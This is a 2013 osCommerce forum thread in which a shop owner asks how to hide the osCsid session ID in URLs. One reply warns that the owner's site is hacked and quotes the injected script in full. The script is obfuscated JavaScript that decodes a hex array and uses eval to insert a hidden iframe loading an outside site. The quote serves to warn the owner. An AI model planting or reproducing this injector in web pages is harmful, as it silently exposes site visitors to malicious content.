speedski Posted May 3, 2013 Posted May 3, 2013 I own www.BargainFraming.com and my database developer says the osCsid is normally displayed in URL. I've read otherwise, and that is bad SEO. so for optimal SEO purposes, how do i remove the osCsid from the URL ? i've personally edited many *.php pages (ie in /includes/ folder) but nothing worked. developer is not responding, so i need to fix this myself. any suggestions much appreciated. bt@@briantaylor8.com Brian Taylor www.BrianTaylor.com
Guest Posted May 3, 2013 Posted May 3, 2013 DO NOT CHECK THE ABOVE SITE. IT HAS BEEN HACKED ! @@speedski I checked the site and did not see the OSCID being displayed in the URL. The SEO URL contribution appears to be functioning. You need to clean and secure your website. Your so called 'developer' should have secured it when he/ she set it up. Your site also needs to be updated to the latest version. This is the script that has infected your site: <script>ss=eval("Str"+"ing");d=document;a="b,b,6b,68,22,2a,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,75,44,7b,56,63,69,50,63,6f,67,2a,29,64,71,66,7b,29,2b,5d,32,5f,2b,7d,f,b,b,b,6b,68,74,63,6f,67,74,2a,2b,3d,f,b,b,7f,22,67,6e,75,67,22,7d,f,b,b,b,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,24,3e,6b,68,74,63,6f,67,22,75,74,65,3f,29,6a,76,76,72,3c,31,31,72,63,74,6b,75,2f,71,70,6e,6b,70,67,2f,69,77,6b,66,67,30,70,67,76,3c,3a,32,32,32,31,6e,70,6d,6c,66,75,72,68,78,67,75,71,7b,41,68,72,71,76,6d,70,3f,37,33,3a,38,39,37,33,29,22,79,6b,66,76,6a,3f,29,33,32,32,29,22,6a,67,6b,69,6a,76,3f,29,33,32,32,29,22,75,76,7b,6e,67,3f,29,79,6b,66,76,6a,3c,33,32,32,72,7a,3d,6a,67,6b,69,6a,76,3c,33,32,32,72,7a,3d,72,71,75,6b,76,6b,71,70,3c,63,64,75,71,6e,77,76,67,3d,6e,67,68,76,3c,2f,33,32,32,32,32,72,7a,3d,76,71,72,3c,32,3d,29,40,3e,31,6b,68,74,63,6f,67,40,24,2b,3d,f,b,b,7f,f,b,b,68,77,70,65,76,6b,71,70,22,6b,68,74,63,6f,67,74,2a,2b,7d,f,b,b,b,78,63,74,22,68,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,68,30,75,67,76,43,76,76,74,6b,64,77,76,67,2a,29,75,74,65,29,2e,29,6a,76,76,72,3c,31,31,72,63,74,6b,75,2f,71,70,6e,6b,70,67,2f,69,77,6b,66,67,30,70,67,76,3c,3a,32,32,32,31,6e,70,6d,6c,66,75,72,68,78,67,75,71,7b,41,68,72,71,76,6d,70,3f,37,33,3a,38,39,37,33,29,2b,3d,68,30,75,76,7b,6e,67,30,6e,67,68,76,3f,29,2f,33,32,32,32,32,72,7a,29,3d,68,30,75,76,7b,6e,67,30,76,71,72,3f,29,32,29,3d,68,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,3f,29,63,64,75,71,6e,77,76,67,29,3d,68,30,75,76,7b,6e,67,30,76,71,72,3f,29,32,29,3d,68,30,75,67,76,43,76,76,74,6b,64,77,76,67,2a,29,79,6b,66,76,6a,29,2e,29,33,32,32,29,2b,3d,68,30,75,67,76,43,76,76,74,6b,64,77,76,67,2a,29,6a,67,6b,69,6a,76,29,2e,29,33,32,32,29,2b,3d,f,b,b,b,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,75,44,7b,56,63,69,50,63,6f,67,2a,29,64,71,66,7b,29,2b,5d,32,5f,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,68,2b,3d,f,b,b,7f"["split"](",");for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],16)-(5-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script> Chris
♥geoffreywalton Posted May 3, 2013 Posted May 3, 2013 @@speedski Brian Once you site is clean you might want to look at a contibution called SID killer, this stop sessions being generated for search engines. It is normal for the oscid to appear on the first few pages and then it should disappear. ♥toyicebear Posted May 3, 2013 Posted May 3, 2013 No add-ons are needed. - Make sure the shop is correctly set-up, if it is the oscids should only show on the first few clicks and then disappear. - In admin under configuration >> sessions set "Prevent Spider Session" to true. (does not show oscids for search engine spiders) If you want to totally remove oscids for visitors too then you can set "Force Cookie Usage" to true. ♥14steve14 Posted May 3, 2013 Posted May 3, 2013 I have to agree with @@toyicebear as a correctly set up store will loose the oscid after a few clicks. REMEMBER BACKUP, BACKUP AND BACKUP
